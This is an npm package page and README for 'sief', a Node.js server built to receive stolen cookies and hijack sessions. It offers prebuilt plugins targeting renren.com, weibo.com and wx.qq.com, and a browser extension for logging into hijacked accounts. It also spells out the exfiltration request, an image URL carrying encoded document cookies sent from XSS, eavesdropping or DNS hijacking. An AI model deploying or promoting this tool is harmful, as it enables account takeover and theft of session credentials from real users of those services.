sief
v0.1.2
Published
Session hijacking tool in Node.
Downloads
10
Maintainers
Readme
sief
A server listening to cookie submission to hijack session, supporting writing plugins for site specific attacks.
sief = thief + safe
This is a project to hijack sessions, and also a project to make your site safer, depending on the way you use it.
Philosophy
- Do NOT steal cookies, only accept cookies from everywhere(xss, network eavsdropping, dns hijacking…)
- Focus on the exploitation of session hijacking.
Features
- Request to an image to upload cookies stolen by xss/network eavsdropping/dns hijack/other.
- Log persistence.
- Prebuilt plugins to attack renren.com, weibo.com, wx.qq.com.
- Write your own plugins to do other attacks you desired. Plugins are loaded/reloaded/unloaded when added/changed/removed automatically, no need to restart.
- View real-time cookie submissions and login to those hijacked sessions directly in browser with Sief Chrome Extension.
- Ignore cookie submissions if the same one is received before, during a specified period of time, to protect your server.
Install
Install PhantomJS
Install sief
npm install sief -g
Usage
Server
Usage: sief [options] <plugin|dir ...>
Options:
-h, --help output usage information
-V, --version output the version number
-i, --ignore-time [seconds] specify seconds during which same requests will be ignored [300]
-p, --port [port] specify the port sief server listening to [3000]
-l, --log-level [level] set log level [INFO]
Submit cookies
GET /xxx.png?cookie=#cookies#&referer=#referer#&domain=#domani#
Parameters:
cookies
- Required. Encode cookies first, for example,encodeURIComponent(document.cookies)
referer
- If the attack is an xss exploit, referer will be retrieved fromheaders.referer
directly, otherwise, specifiy it in query string.domain
- Domain is calculated from referer, defaults to main domain, for exampleqq.com
. IF you want to fire a attack to its subdomain(wx.qq.com
), specify it in query string.